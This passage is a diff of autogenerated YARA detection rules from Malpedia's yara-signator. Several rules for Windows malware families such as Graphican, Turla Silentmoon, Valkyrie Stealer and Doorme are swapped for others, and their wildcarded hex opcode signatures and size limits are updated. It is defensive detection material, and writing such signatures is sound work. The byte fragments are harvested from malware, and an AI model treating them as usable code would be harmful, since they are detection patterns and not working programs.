+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.suppobox_auto.yar#L1-L191"
 		license_url = "N/A"
-		logic_hash = "4ea64380581d8093475f0f95452d6256bbd394365c1616fdf688ce08e91d23e0"
+		logic_hash = "05beb26ad12e675f535ee9462bf9d41a047c1dcd3464f804af01fdd75563ee81"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -100995,32 +101176,44 @@ rule MALPEDIA_Win_Graphican_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bbed0030000 8b5dfc 2bf8 8d04fa 8b51fc 8b7de8 899486e8010000 }
-		$sequence_1 = { 757b 8b4d0c 57 8b7d08 8955fc 894d08 85c0 }
-		$sequence_2 = { 57 c785f0dfffff00000000 ff15???????? 8b85ecdfffff 8b8df0dfffff 53 50 }
-		$sequence_3 = { 8b7de8 899486e8010000 8b45ec 40 43 }
-		$sequence_4 = { 897dc0 3c30 7c04 3c39 7e4b 8b5d08 397318 }
-		$sequence_5 = { 746d 53 8d9ef4030000 807e0400 8bc3 7428 33d2 }
-		$sequence_6 = { 5e c3 33c0 33d2 85c0 5f 0f94c0 }
-		$sequence_7 = { 8b4148 ffd0 8b7dc0 33f6 895dc8 895dc4 }
-		$sequence_8 = { 8b10 50 8b4208 ffd0 8b45c8 3bc3 }
-		$sequence_9 = { 83c40c 50 e8???????? 8bf8 83c404 }
+		$sequence_0 = { 7e10 a1???????? 0305???????? a3???????? }
+		$sequence_1 = { 3bc8 7d10 a1???????? 2b05???????? a3???????? }
+		$sequence_2 = { 890d???????? e8???????? 8bf0 e8???????? 03f0 }
+		$sequence_3 = { 8945f0 a1???????? 83e801 a3???????? }
+		$sequence_4 = { 7412 8b0d???????? 030d???????? 890d???????? }
+		$sequence_5 = { 7d10 a1???????? 0b05???????? a3???????? }
+		$sequence_6 = { 7f10 a1???????? 2305???????? a3???????? }
+		$sequence_7 = { 01c6 39fe 0f8d2f020000 80bc2ef4f7ffff0a }
+		$sequence_8 = { 019dacf7ffff 83c40c 299dc4f7ffff e9???????? }
+		$sequence_9 = { 8d48ff 2d9b507602 8985dcfdffff db85dcfdffff }
+		$sequence_10 = { 01c6 39fe 0f8d7e010000 80bc2ef4f7ffff0a }
+		$sequence_11 = { 8d48ff 2d9696ca2f 39c2 66898d92feffff 0f8dbbfcffff }
+		$sequence_12 = { 01bdacf7ffff 83c40c 83bdc8f7ffff00 8b95c8f7ffff }
+		$sequence_13 = { 01d8 3b85b0f7ffff 7e2f 8b95c8f7ffff }
+		$sequence_14 = { 8d48ff 39c2 890d???????? 0f8e93240000 }
+		$sequence_15 = { 8d48ff 2de13d1921 8985e0f8ffff db85e0f8ffff }
+		$sequence_16 = { 01d7 68???????? 57 e8???????? }
+		$sequence_17 = { 8d48ff 39c2 898db4f8ffff 0f8e3d0f0000 }
+		$sequence_18 = { 01c6 ebdb ff7510 57 }
+		$sequence_19 = { 01c9 4a 79f2 833b54 }
+		$sequence_20 = { 8d48ff 2dbb4fb754 39c2 66890d???????? }
+		$sequence_21 = { 8d48ff 39c2 898dc8feffff 0f8ebb010000 }
 
 	condition:
-		7 of them and filesize < 362496
+		7 of them and filesize < 1875968
 }
-rule MALPEDIA_Win_Jssloader_Auto : FILE
+rule MALPEDIA_Win_Alpc_Lpe_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7148d41e-3b6b-5706-b0f5-a23188997a17"
+		id = "9201dab6-c827-5ba9-b6a2-6cc5f0b64e34"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jssloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.jssloader_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.alpc_lpe"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.alpc_lpe_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "ffccc96c8251d57f1e22bfb5c0a6de3c234295ba8c011aea9715fb2c8123c39a"
+		logic_hash = "f47b6095e2a1dadfd3fc285c90742ae34b69859fcd8b2fa148af803fa48f9175"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -101034,32 +101227,32 @@ rule MALPEDIA_Win_Jssloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3d55555515 0f846b010000 8b4b08 8d7001 2bcf b8abaaaa2a f7e9 }
-		$sequence_1 = { c645cc00 898570feffff 3bf0 7432 8bbd64feffff 8b4de4 03cf }
-		$sequence_2 = { 8d4de4 e8???????? 8a75d7 8b75e8 8b5dec 8b45c4 }
-		$sequence_3 = { 7e0f 803c0f22 0f84d6000000 41 3bc8 7cf1 33c0 }
-		$sequence_4 = { c785bcfdffff00000000 c785c0fdffff0f000000 c685acfdffff00 83fa10 722f 8b8d64fdffff 42 }
-		$sequence_5 = { 83c404 85c0 0f844a010000 8d7823 83e7e0 8947fc eb13 }
-		$sequence_6 = { c7805413440002000000 6a04 58 6bc000 8b0d???????? 894c05f8 6a04 }
-		$sequence_7 = { c745c800000000 c645fc02 3b4dec 741a 33d2 33f6 8911 }
-		$sequence_8 = { 8875d7 3bf9 7408 8817 47 897de8 eb13 }
-		$sequence_9 = { b8abaaaa2a 2bcf 895df0 f7e9 8b4b04 c1fa03 2bcf }
+		$sequence_0 = { 33c9 0f1f440000 0fb70429 4883c102 6689440ffc 6685c0 }
+		$sequence_1 = { 48894540 c7455040000000 48c7454800000000 48c7455800000000 48c7456000000000 48c785c800000000000000 c785e800000000000000 }
+		$sequence_2 = { 488bfc b932000000 b8cccccccc f3ab 488b8c24e8000000 488b85e0000000 488b4008 }
+		$sequence_3 = { 488b8d00010000 e8???????? 488b8dd8000000 488bd1 488bc8 e8???????? }
+		$sequence_4 = { 488d1d5c8e0000 8bf7 488b2b 4885ed 741b 837b0801 7415 }
+		$sequence_5 = { 488bec 488bfc b932000000 b8cccccccc f3ab 488b8c24e8000000 488b85e0000000 }
+		$sequence_6 = { 488b8d08010000 488908 48837d0800 7418 488b8d00010000 e8???????? }
+		$sequence_7 = { 83f8ff 7526 4c8d2587860000 493bdc }
+		$sequence_8 = { b8cccccccc f3ab 488b8c24e8000000 488b85e0000000 48c70000000000 488b85e0000000 488da5c8000000 }
+		$sequence_9 = { 4c8b8500010000 488bd0 488d0d60b20000 e8???????? 48894508 8b4508 8bf8 }
 
 	condition:
-		7 of them and filesize < 581632
+		7 of them and filesize < 540672
 }
-rule MALPEDIA_Win_Dubrute_Auto : FILE
+rule MALPEDIA_Win_Unidentified_105_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8b3f57fb-3926-53bd-845a-86ae7ddb65ab"
+		id = "3a3e23fc-74b8-538e-83ea-6f636ca69973"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dubrute"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dubrute_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_105"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_105_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "15ef5a601ee94177845777a653e057c97a84bc2521287b368cd711d048d0bf0d"
+		logic_hash = "f4fc15196e62980ff75ec5048526dde4db7767af139fed75b0b1419b85a6dee5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -101073,32 +101266,32 @@ rule MALPEDIA_Win_Dubrute_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 8d85d0fcffff bfff000000 50 57 ff15???????? 8d85d0fcffff }
-		$sequence_1 = { ff7514 8b8674090000 ff7510 ff750c ff7008 e8???????? 83c410 }
-		$sequence_2 = { 55 8bec 83ec24 56 57 6a0c 8d45f4 }
-		$sequence_3 = { 395008 7510 8b4808 3bca 7c09 83f907 7f04 }
-		$sequence_4 = { e9???????? 8d45fc 50 53 e8???????? 59 85c0 }
-		$sequence_5 = { 8b8040000100 83b81804000000 741e 837df800 7418 83b80c04000008 7e0f }
-		$sequence_6 = { 894508 8d8564ffffff 6a01 50 8d4dc8 ff15???????? db4508 }
-		$sequence_7 = { ff7508 50 e8???????? 8bf0 8d7de8 }
-		$sequence_8 = { 8bf0 8d7df0 a5 a5 a5 8b75f0 83c43c }
-		$sequence_9 = { 0f8cce000000 83650800 837f0400 8b7510 bb???????? 7e70 8b07 }
+		$sequence_0 = { e8???????? 6800100000 8bf0 57 56 }
+		$sequence_1 = { 6a00 8d8dd0feffff 51 8d95fcfeffff }
+		$sequence_2 = { e8???????? 8bd8 83c404 53 8bce }
+		$sequence_3 = { e8???????? 6800002000 8bf8 6a00 57 897df4 }
+		$sequence_4 = { 8a08 40 84c9 75f9 2bc2 6a02 8d4c30fe }
+		$sequence_5 = { 85c0 750d 68???????? e8???????? 83c404 8b8df0efffff }
+		$sequence_6 = { 8b742414 83c404 b9???????? 8bc6 8d642400 }
+		$sequence_7 = { 8b3d???????? 8d45e4 50 33f6 }
+		$sequence_8 = { eb13 83f801 750e a1???????? }
+		$sequence_9 = { 8b85f4efffff 83c40c 6a00 8d8decefffff 51 6800100000 }
 
 	condition:
-		7 of them and filesize < 598016
+		7 of them and filesize < 253952
 }
-rule MALPEDIA_Win_Turla_Silentmoon_Auto : FILE
+rule MALPEDIA_Win_Ratankbapos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "711d8460-3e95-57e5-96e4-0d30c9eba978"
+		id = "c30c3afc-d593-5fd1-9897-681a89fdb715"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.turla_silentmoon"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.turla_silentmoon_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratankbapos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ratankbapos_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "3d4cfb37bdf5585573f2013bd7786899d7b9f149ed83fd0e028e64c3f10d7b64"
+		logic_hash = "9d94248f5eeb0fe7fd704ad2035548b948a3d89033ce9c65e0f71221072d6968"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -101112,32 +101305,32 @@ rule MALPEDIA_Win_Turla_Silentmoon_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4df4 83c404 51 ffd7 83c404 8d95e4f7ffff }
-		$sequence_1 = { 7ce0 8b55d4 47 03c9 897dd0 3bfa 7ec7 }
-		$sequence_2 = { 41 3b4df0 7ce3 8955d4 83fa11 0f8fe8000000 83f801 }
-		$sequence_3 = { 50 6a01 8d4dff 51 56 c645ffec 895dec }
-		$sequence_4 = { ff15???????? 8b4ddc 8b35???????? 51 ffd6 8b55e0 52 }
-		$sequence_5 = { 85c0 7407 32c0 5e 8be5 5d c3 }
-		$sequence_6 = { 8955fc 8bd9 8975f4 8bc6 8bff 3bc8 7f24 }
-		$sequence_7 = { 09be58020000 8b7df8 898e5c020000 0fb77c7b52 897df4 8b3cba 897dd4 }
-		$sequence_8 = { 83f801 752e 8b4508 8b7c245c }
-		$sequence_9 = { 5f 8be5 5d c3 8b55fc 6a04 8d4df8 }
+		$sequence_0 = { 33c5 8945f8 56 8b7508 85f6 0f8413010000 }
+		$sequence_1 = { ff15???????? 8bf0 8d4dcc 897304 }
+		$sequence_2 = { 0fbec2 0fbe8040010110 83e00f eb02 33c0 0fbe84c160010110 }
+		$sequence_3 = { c1f905 8b0c8de04d0110 83e01f c1e006 f644080401 }
+		$sequence_4 = { eb05 1bc0 83d8ff 85c0 7508 8d8646b10000 }
+		$sequence_5 = { 83e203 83f908 7229 f3a5 ff249590490010 }
+		$sequence_6 = { 40 3acb 75f9 2bc6 3bd0 72dc }
+		$sequence_7 = { 8b5518 50 8b4514 51 8b4d08 52 50 }
+		$sequence_8 = { e8???????? 8b4da4 8945c8 c6040800 }
+		$sequence_9 = { 0fbe8040010110 83e00f eb02 33c0 0fbe84c160010110 6a07 c1f804 }
 
 	condition:
-		7 of them and filesize < 204800
+		7 of them and filesize < 327680
 }
-rule MALPEDIA_Win_Brutpos_Auto : FILE
+rule MALPEDIA_Win_Mikoponi_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "bb6abccd-59b3-5a30-9e67-ccbe498737a5"
+		id = "de82eebe-f707-5dc6-9c33-0ae7d7821633"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.brutpos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.brutpos_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mikoponi"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mikoponi_auto.yar#L1-L107"
 		license_url = "N/A"
-		logic_hash = "89d0bc6a7e52ba9f63dface96ebbf483b03be0cbf8144ed32f3b88bf360b4eda"
+		logic_hash = "8f3a24b96a22a4d512e188ba3c40bc90dbbbc4bf56cf9ed6cddde59c392fa78b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -101151,32 +101344,30 @@ rule MALPEDIA_Win_Brutpos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 59 58 83c004 83e904 8808 }
-		$sequence_1 = { 03c2 034508 2938 83e902 75e8 ebd9 5e }
-		$sequence_2 = { 8d5b18 8b5b60 03d8 52 8b35???????? }
-		$sequence_3 = { 6681f9df77 7412 0f31 8bd8 }
-		$sequence_4 = { 8bd0 ad 8bc8 83e908 66ad 6685c0 740c }
-		$sequence_5 = { 8d7c38fc baffffffff 83c704 57 }
-		$sequence_6 = { 66ad 6685c0 740c 25ff0f0000 03c2 034508 }
-		$sequence_7 = { 52 e8???????? 59 8b09 8bd1 }
-		$sequence_8 = { c1e202 03d3 8b12 03d0 }
-		$sequence_9 = { 8b5508 8b4204 0fb70a 50 51 807401ff97 }
+		$sequence_0 = { 8b07 50 e8???????? 83c404 5e 5b 5d }
+		$sequence_1 = { 57 e8???????? 2bc7 d1f8 8d742420 }
+		$sequence_2 = { e9???????? 68f4010000 56 ff15???????? 8bf8 e8???????? e9???????? }
+		$sequence_3 = { ff15???????? 8b442468 89442414 89442418 33c0 89442430 }
+		$sequence_4 = { b9???????? 8d442440 668b10 663b11 751e }
+		$sequence_5 = { e8???????? 83c408 8d4c2414 51 57 }
+		$sequence_6 = { 81c470040000 c3 68???????? 68???????? ff15???????? 50 ff15???????? }
+		$sequence_7 = { e8???????? 68???????? e8???????? 68???????? e8???????? 8b7c2420 57 }
 
 	condition:
-		7 of them and filesize < 65536
+		7 of them and filesize < 330752
 }
-rule MALPEDIA_Win_Anchormtea_Auto : FILE
+rule MALPEDIA_Win_Tokyox_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "32582435-d23f-5bf2-99b8-f6c7ec2febef"
+		id = "d34e4ceb-0bc2-5477-9c12-3a529f2527e6"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.anchormtea"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.anchormtea_auto.yar#L1-L158"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tokyox"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tokyox_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "0d56b6ebc1869a5136446b1b05f633dc23ded4ac41169656ca6cd600d19c6d7b"
+		logic_hash = "a5f77c70b1ac6566e10c0515d32c74e5ec77d8ebaa8bcecbb1bfc331f53b6f71"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -101190,37 +101381,32 @@ rule MALPEDIA_Win_Anchormtea_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e9???????? f7d8 1bc0 83e002 }
-		$sequence_1 = { 4883f81f 0f87fd170000 488bce e8???????? 4c8d8b44010000 4c8d05255f0200 }
-		$sequence_2 = { 898d68f7ffff 89b564f7ffff 3bd0 7741 }
-		$sequence_3 = { 8bc2 c1e81f 03c2 8945fc b8619e426b f7e9 }
-		$sequence_4 = { 4533c0 48c7c100000080 897c2420 ff15???????? 85c0 7563 }
-		$sequence_5 = { 89442450 8b45dc 89542448 418bd2 }
-		$sequence_6 = { 8bd9 4c8d0d69cc0000 b904000000 4c8d0555cc0000 488d15c6af0000 e8???????? }
-		$sequence_7 = { 6800010000 ff761c e8???????? ff75e0 668b45cc 6824080000 }
-		$sequence_8 = { 4585ff 0f84d3000000 33ff 4d63e7 }
-		$sequence_9 = { 83c414 c744241000000000 57 ff15???????? }
-		$sequence_10 = { ff15???????? 488bf8 4885c0 7410 33d2 }
-		$sequence_11 = { 55 8bec 81ec8c030000 a1???????? 33c5 8945fc ff05???????? }
-		$sequence_12 = { c7471c40300010 894714 c7472060300010 c7472480300010 c7472890300010 c7472cb0300010 }
-		$sequence_13 = { 51 e8???????? 83c408 8bb70c010000 89b568f7ffff 85f6 0f846c010000 }
-		$sequence_14 = { 4c897e10 4903c5 488bcb 4c8d3c12 }
+		$sequence_0 = { ff15???????? 85c0 0f84b6010000 8d4590 }
+		$sequence_1 = { e8???????? 8b4508 83c40c b90d0a0000 66890c07 }
+		$sequence_2 = { c745f450726f64 50 6a00 8d45f4 c745f87563744e }
+		$sequence_3 = { 0f842e020000 8d4df0 c745fc00000000 51 }
+		$sequence_4 = { 8d45f8 50 6a05 ff7608 ffd7 6a3c ff7510 }
+		$sequence_5 = { 51 56 6a00 68e9fd0000 ff15???????? 8945e4 33db }
+		$sequence_6 = { 7534 83f801 721f 66a1???????? 8d5601 }
+		$sequence_7 = { 8bec a1???????? 3b05???????? 0f85a10f0000 ff7508 e8???????? 59 }
+		$sequence_8 = { 8bf2 c745a046003400 c745a435003000 c745a831002d00 c745ac46003400 c745b034004700 c745b42d003400 }
+		$sequence_9 = { ff15???????? 894608 85c0 754e ff15???????? 8b4e08 }
 
 	condition:
-		7 of them and filesize < 839680
+		7 of them and filesize < 237568
 }
-rule MALPEDIA_Win_Valkyrie_Stealer_Auto : FILE
+rule MALPEDIA_Win_Polyglotduke_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d4598928-8b14-591c-9777-90769a8eecd7"
+		id = "5c295965-8bd5-593f-b721-c3ba45184139"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.valkyrie_stealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.valkyrie_stealer_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.polyglotduke"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.polyglotduke_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "c5262da30071ead337de0712314a64ba13ec652e925a6c656e4cda19b1fcb853"
+		logic_hash = "02803fa0214e774a255c3af744ecd162ea9c7b022e39aa2c1104c52737c743df"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -101234,32 +101420,32 @@ rule MALPEDIA_Win_Valkyrie_Stealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 89442430 85c0 0f85ab130000 4a8b4c3500 44396914 7d18 e8???????? }
-		$sequence_1 = { 85c9 741c 498b07 44386067 750f 498b8788000000 488d0c49 }
-		$sequence_2 = { e8???????? 448b4ddc eb2a 8d4101 418907 488d0c49 488b8388000000 }
-		$sequence_3 = { 8bc2 c645b82d c1e81f 03d0 c645bb20 c645be3a 8d0492 }
-		$sequence_4 = { 8bde eb4e 803c3e75 751b 8d4305 413bc6 7359 }
-		$sequence_5 = { e8???????? 8d4701 e9???????? 8bcd 488d15829f0b00 4803ce 41b804000000 }
-		$sequence_6 = { 8b8590000000 ffc8 4898 488d0c40 488d1ccf 0fbe4301 3cfa }
-		$sequence_7 = { 7417 4c8b542448 41f6427002 750b 410fbae61c 0f820c010000 488b85f0000000 }
-		$sequence_8 = { 488bf0 4885c0 0f84cb000000 837d0800 7411 488b4f20 498bd6 }
-		$sequence_9 = { eb25 48c744242002000000 4c8d0d17781100 4533c0 ba02000000 488d8c2498000000 e8???????? }
+		$sequence_0 = { 488bcb 4803f7 e8???????? eb38 488d0d190f0100 e8???????? b905000000 }
+		$sequence_1 = { f6431840 4c8d0d0269ffff 0f85a5000000 488bcb e8???????? 488d15fdd30000 413bc6 }
+		$sequence_2 = { 4c8bf8 e8???????? 488d0d86d20000 4c8bf0 e8???????? 488d0d7fd20000 4c8be8 }
+		$sequence_3 = { 48894608 4803c8 e8???????? 8b54244c }
+		$sequence_4 = { 8a4f02 4c8bf0 884803 488bcf e8???????? 8b06 }
+		$sequence_5 = { 4c8d0d35db0000 33c0 498bd1 448d4008 3b0a 742b ffc0 }
+		$sequence_6 = { ff15???????? 488b5c2430 488bcb 8d78fb ff15???????? 03c7 }
+		$sequence_7 = { 498bd5 498bce ff15???????? 33ff }
+		$sequence_8 = { 7e74 817d0063736de0 7528 48833d????????00 741e 488d0d79db0000 }
+		$sequence_9 = { e9???????? 488bca ff15???????? 83f847 75eb 488bcd ff15???????? }
 
 	condition:
-		7 of them and filesize < 2895872
+		7 of them and filesize < 222784
 }
-rule MALPEDIA_Win_Supernova_Auto : FILE
+rule MALPEDIA_Win_Nimrev_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b0d23010-e706-5a6c-87f1-b10df99d0461"
+		id = "45a43e4c-b390-5a59-8f10-bde6512a2548"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.supernova"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.supernova_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nimrev"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nimrev_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "3eb1ef4641d5ab988a67e433660b28cc5e0a8f3de783c5473bb118a467afaed4"
+		logic_hash = "cfe876922fc1333031ee5c82f8f6e15e7c6a81cc34499037bfc98c907bd66dbf"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -101273,32 +101459,32 @@ rule MALPEDIA_Win_Supernova_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 1107 17 91 1f50 3339 1107 }
-		$sequence_1 = { 1308 03 6f0b00000a 6f1c00000a 1107 16 }
-		$sequence_2 = { 26 25 6f2800000a 72b1010070 }
-		$sequence_3 = { 19 91 1f47 3329 }
-		$sequence_4 = { 3341 1107 17 91 1f50 3339 }
-		$sequence_5 = { 1f0a 9d 6f0a00000a 1304 03 6f0b00000a }
-		$sequence_6 = { de00 03 6f0800000a 6f0e00000a }
-		$sequence_7 = { 3309 72e3000070 1308 2b5a 1107 }
-		$sequence_8 = { 16 91 2089000000 3341 }
-		$sequence_9 = { 7e01000004 7211010070 1109 6f2200000a de00 03 6f0b00000a }
+		$sequence_0 = { 8845ef eb01 90 807def00 }
+		$sequence_1 = { 0fb600 3c5f 7507 b801000000 }
+		$sequence_2 = { 3c7d 7407 b801000000 eb05 }
+		$sequence_3 = { 7507 b801000000 eb05 b800000000 8845f7 eb01 90 }
+		$sequence_4 = { 0fb600 3c7d 7407 b801000000 eb05 b800000000 }
+		$sequence_5 = { ffd0 90 e9???????? 90 b9d0070000 }
+		$sequence_6 = { c1e002 01d0 01c0 29c1 89c8 83c030 89c1 }
+		$sequence_7 = { 89c2 89d0 c1e002 01d0 01c0 29c1 89c8 }
+		$sequence_8 = { 83f001 84c0 7408 90 e8???????? eb01 }
+		$sequence_9 = { 0f9ec0 8845ef eb01 90 807def00 }
 
 	condition:
-		7 of them and filesize < 50176
+		7 of them and filesize < 1141760
 }
-rule MALPEDIA_Win_Varenyky_Auto : FILE
+rule MALPEDIA_Win_Rook_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d2bf30dc-4373-5dce-a9a9-0dfa02ec7d8e"
+		id = "260fb3cd-c612-5c83-b4f7-79756559f934"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.varenyky"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.varenyky_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rook"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rook_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "80f9f91b6d82bcfc676dfe7703a76fa743f54b58e262b45f8642f9e3f2fdc01d"
+		logic_hash = "c73a208061affa8ef6930cc993d1e8f8eb5228d371bb421012877d9aae5cbf16"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -101312,32 +101498,32 @@ rule MALPEDIA_Win_Varenyky_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 1bc0 83d8ff 85c0 0f8467010000 8d8c2490000000 51 6804010000 }
-		$sequence_1 = { 85c0 0f8ef7010000 8b15???????? a0???????? 6a00 }
-		$sequence_2 = { bf697a0000 3bc3 7411 90 69ff81000000 }
-		$sequence_3 = { 8d8c2454010000 68???????? 51 e8???????? 8d84245c010000 83c40c 8d5001 }
-		$sequence_4 = { 83c40c 8d4c2418 51 8d94244c030000 }
-		$sequence_5 = { 57 e8???????? 83c404 3c33 }
-		$sequence_6 = { 8d84244d030000 53 50 c744242404010000 889c2454030000 e8???????? }
-		$sequence_7 = { 0f8c0b0a0000 8ac2 2c20 3c58 7711 0fbec2 0fbe8030c24000 }
-		$sequence_8 = { 3bc3 7411 90 69ff81000000 41 }
-		$sequence_9 = { 8b84241c010000 83c40c 50 33d2 80bc242602000001 b905000000 0f95c2 }
+		$sequence_0 = { ffc3 4883c708 83fb22 72df 498bd6 488bcd ff15???????? }
+		$sequence_1 = { 0f8521ffffff 44882b eb7b 488b9540070000 4c8d05979e0000 498bce }
+		$sequence_2 = { 33d2 ff15???????? 488b0d???????? 4d8bc7 33d2 ff15???????? 833d????????00 }
+		$sequence_3 = { ff15???????? 488bce e8???????? 488d542440 488bcd ff15???????? 85c0 }
+		$sequence_4 = { 4883ec38 488d05f5990000 41b91b000000 4889442420 e8???????? 4883c438 c3 }
+		$sequence_5 = { 498bd6 4d8d8115cc0400 4d03c4 0f1f4000 410fb64410ff 3cff 740b }
+		$sequence_6 = { c605????????63 4c8d250099ffff b8ff000000 4d8d4901 }
+		$sequence_7 = { 498bcd 4c89bc2458270000 ff15???????? 488b0d???????? 4d8bc5 33d2 4c8be0 }
+		$sequence_8 = { 8bd9 4c8d0dddce0000 b904000000 4c8d05c9ce0000 488d15b2bb0000 e8???????? }
+		$sequence_9 = { 4863c8 4c8d4c2450 48894c2420 e8???????? 488d4c2450 ff15???????? }
 
 	condition:
-		7 of them and filesize < 24846336
+		7 of them and filesize < 843776
 }
-rule MALPEDIA_Win_Rustonotto_Auto : FILE
+rule MALPEDIA_Win_Doorme_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c96a83b8-aab4-55d7-a6bc-2f4705409146"
+		id = "a443311b-0d69-50e1-b7af-6bea174db5b1"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rustonotto"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rustonotto_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doorme"
